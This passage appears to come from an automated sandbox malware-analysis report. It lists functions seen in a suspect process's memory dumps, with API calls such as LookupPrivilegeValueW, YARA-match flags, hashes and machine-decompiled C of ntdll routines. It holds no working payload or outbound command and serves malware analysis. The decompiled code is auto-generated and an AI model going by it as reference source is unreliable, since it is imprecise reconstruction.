                                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                            • Instruction Fuzzy Hash: 03E012B1200208ABDB14EF99CC85EA777ACAF88750F158558BE085B242C630F910CAB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00AC8A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,00ABCFD2,00ABCFD2,?,00000000,?,?), ref: 00AC8A90
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LookupPrivilegeValue
                                                            • String ID:
                                                            • API String ID: 3899507212-0
                                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                            • Instruction ID: 7ef1ae4accb77ebe66afb469ad247ca3d54ef31f1ec49840fdc4c08b815c44dd
                                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                            • Instruction Fuzzy Hash: D6E01AB1200208ABDB10DF49CC85EE737ADAF88750F018154BE0857242C930E8108BF5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00ABD437, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00AB7C93,?), ref: 00ABD46B
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: ea8ae35123d4d4cdb12d068ef0ac2089fa81a1dd3e9039dd27c7d13a4ca72de2
                                                            • Instruction ID: bb1a6417ab0746d0d164f796c08d0939310e90e37e2d872b4c3744126f66f259
                                                            • Opcode Fuzzy Hash: ea8ae35123d4d4cdb12d068ef0ac2089fa81a1dd3e9039dd27c7d13a4ca72de2
                                                            • Instruction Fuzzy Hash: 86E08C726402082AEB20EBB88C02FAA27E59B54610F0940A8F48EE72C3E920E5018611
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00ABD440, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00AB7C93,?), ref: 00ABD46B
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                            • Instruction ID: affcd27765c0a438128cf8f18a4344593b7504e75a30bb8636afd84e7c1e23c7
                                                            • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                            • Instruction Fuzzy Hash: 86D0A7767503083BEA10FBA89C03F6632CC5B44B00F494064F94DD73C3E960F5004161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00AC88FA, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00AC3546,?,00AC3CBF,00AC3CBF,?,00AC3546,?,?,?,?,?,00000000,00000000,?), ref: 00AC88ED
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 9b29b8d8f6333de4d83fe617719c6518b8236949c0701bbc89efbad10dc8480f
                                                            • Instruction ID: 07aa649658677b983f4385ee62ba6894a5f3278b90eb43042ff91d38831e0cd7
                                                            • Opcode Fuzzy Hash: 9b29b8d8f6333de4d83fe617719c6518b8236949c0701bbc89efbad10dc8480f
                                                            • Instruction Fuzzy Hash: 3BA022BBA2208C000020B3F23C08BAAE20C80C33FB2230CEFC02C30803888BC008332E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0538967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.617905723.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                                            • Associated: 0000000B.00000002.618351777.000000000543B000.00000040.00000001.sdmp Download File
                                                            • Associated: 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 246a86d5330bd7283100838a1189c2ba8c5cca116b0086dd58e6a538c4608b9f
                                                            • Instruction ID: 2aef33a37b9e9e7fad71a9b5e4db38c2924a756533d822112ee7eee0d8bc568c
                                                            • Opcode Fuzzy Hash: 246a86d5330bd7283100838a1189c2ba8c5cca116b0086dd58e6a538c4608b9f
                                                            • Instruction Fuzzy Hash: E8B09BB29015C5C5DA15E7604708B37791177D0751F56C461D1060641A4778C491F5F5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 0537A61C, Relevance: .1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E0537A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x5420220);
				E0539D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x5437b9c; // 0x0
				_t55 = L05364620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0539D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x5437b10 =  *0x5437b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x543536c;
					if( *_t51 != 0x5435368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x5435368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x543536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0537A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                            0x0537a61c
                                                            0x0537a61e
                                                            0x0537a623
                                                            0x0537a628
                                                            0x0537a62b
                                                            0x0537a62d
                                                            0x0537a648
                                                            0x0537a64a
                                                            0x0537a64f
                                                            0x053b9b44
                                                            0x0537a6ec
                                                            0x0537a6f1
                                                            0x0537a6f1
                                                            0x0537a655
                                                            0x0537a657
                                                            0x0537a65a
                                                            0x0537a65d
                                                            0x0537a662
                                                            0x0537a663
                                                            0x0537a667
                                                            0x0537a668
                                                            0x0537a66d
                                                            0x0537a706
                                                            0x0537a706
                                                            0x053b9bda
                                                            0x053b9be6
                                                            0x053b9beb
                                                            0x00000000
                                                            0x053b9beb
                                                            0x0537a679
                                                            0x053b9b7a
                                                            0x00000000
                                                            0x053b9b7a
                                                            0x0537a683
                                                            0x0537a6f4
                                                            0x0537a6f7
                                                            0x0537a6f9
                                                            0x0537a6fd
                                                            0x0537a6a0
                                                            0x0537a6a0
                                                            0x0537a6ad
                                                            0x0537a6af
                                                            0x0537a6b4
                                                            0x053b9ba7
                                                            0x053b9bac
                                                            0x00000000
                                                            0x00000000
                                                            0x053b9bc6
                                                            0x053b9bce
                                                            0x053b9bd1
                                                            0x053b9bd3
                                                            0x053b9bd3
                                                            0x00000000
                                                            0x053b9bd1
                                                            0x0537a6bd
                                                            0x0537a6c3
                                                            0x0537a6c6
                                                            0x0537a6d2
                                                            0x0537a701
                                                            0x0537a704
                                                            0x00000000
                                                            0x0537a704
                                                            0x0537a6d4
                                                            0x0537a6d6
                                                            0x0537a6d9
                                                            0x0537a6db
                                                            0x0537a6e1
                                                            0x0537a6e6
                                                            0x0537a6e8
                                                            0x0537a6e8
                                                            0x0537a6ea
                                                            0x00000000
                                                            0x0537a6ea
                                                            0x0537a688
                                                            0x0537a692
                                                            0x0537a694
                                                            0x0537a699
                                                            0x00000000
                                                            0x00000000
                                                            0x0537a69d
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.617905723.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                                            • Associated: 0000000B.00000002.618351777.000000000543B000.00000040.00000001.sdmp Download File
                                                            • Associated: 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 61806537543a524870bdfc244936c4d2d852022887bf3d7fb789e0aaf726632f
                                                            • Instruction ID: da5f367a397a94cd141f58ab5f48a2778b267857c715e6e79751ec76405052db
                                                            • Opcode Fuzzy Hash: 61806537543a524870bdfc244936c4d2d852022887bf3d7fb789e0aaf726632f
                                                            • Instruction Fuzzy Hash: BB4179B5E14209DFDB19CF58C890BADBBF2FF49304F1580A9E905AB355C7B8A901CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0538387E, Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0538387E(void* __ecx) {
				intOrPtr* _t2;
				void* _t4;

				_t4 = __ecx;
				_t2 =  *0x5435368;
				while(_t2 != 0x5435368) {
					if( *((intOrPtr*)(_t2 + 0x20)) != _t4) {
						_t2 =  *_t2;
						continue;
					}
					return _t2;
				}
				return 0;
			}





                                                            0x0538387e
                                                            0x0538387e
                                                            0x05383891
                                                            0x0538388d
                                                            0x0538388f
                                                            0x00000000
                                                            0x0538388f
                                                            0x05383897
                                                            0x05383897
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.617905723.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                                            • Associated: 0000000B.00000002.618351777.000000000543B000.00000040.00000001.sdmp Download File
                                                            • Associated: 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b21f855dc0a82b5c65ee43557835c78ae1faac0bf3d5f60aae4e4234b32aa9ec
                                                            • Instruction ID: 9b7307fd75a7df3cf2e5b1f71fd7234659f9f272355ce993a19f42ef1332ccbb
                                                            • Opcode Fuzzy Hash: b21f855dc0a82b5c65ee43557835c78ae1faac0bf3d5f60aae4e4234b32aa9ec
                                                            • Instruction Fuzzy Hash: D9C04C747193018B5F5DE61598C58B577A2FB499053584DAAE841C7B24D7A0D885CA01
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 053DFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 53%
                                                            			E053DFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0538CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E053D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E053D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                            0x053dfdda
                                                            0x053dfde2
                                                            0x053dfde5
                                                            0x053dfdec
                                                            0x053dfdfa
                                                            0x053dfdff
                                                            0x053dfe0a
                                                            0x053dfe0f
                                                            0x053dfe17
                                                            0x053dfe1e
                                                            0x053dfe19
                                                            0x053dfe19
                                                            0x053dfe19
                                                            0x053dfe20
                                                            0x053dfe21
                                                            0x053dfe22
                                                            0x053dfe25
                                                            0x053dfe40

                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 053DFDFA
                                                            Strings
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 053DFE2B
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 053DFE01
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.617905723.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                                            • Associated: 0000000B.00000002.618351777.000000000543B000.00000040.00000001.sdmp Download File
                                                            • Associated: 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                            • API String ID: 885266447-3903918235
                                                            • Opcode ID: 527820b02391352e0b7a7d37b1b5a5a5007e3d7ccdf91cb0820f9c25f4f5af24
                                                            • Instruction ID: d79519a4070d9f17be45d478148b4da128a6caaa32841f9c6a981ce380fc9beb
                                                            • Opcode Fuzzy Hash: 527820b02391352e0b7a7d37b1b5a5a5007e3d7ccdf91cb0820f9c25f4f5af24
                                                            • Instruction Fuzzy Hash: 44F0F637240201BFD7241A45EC46F23FB6AEB44730F244314F628565E1DA62F92096F0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%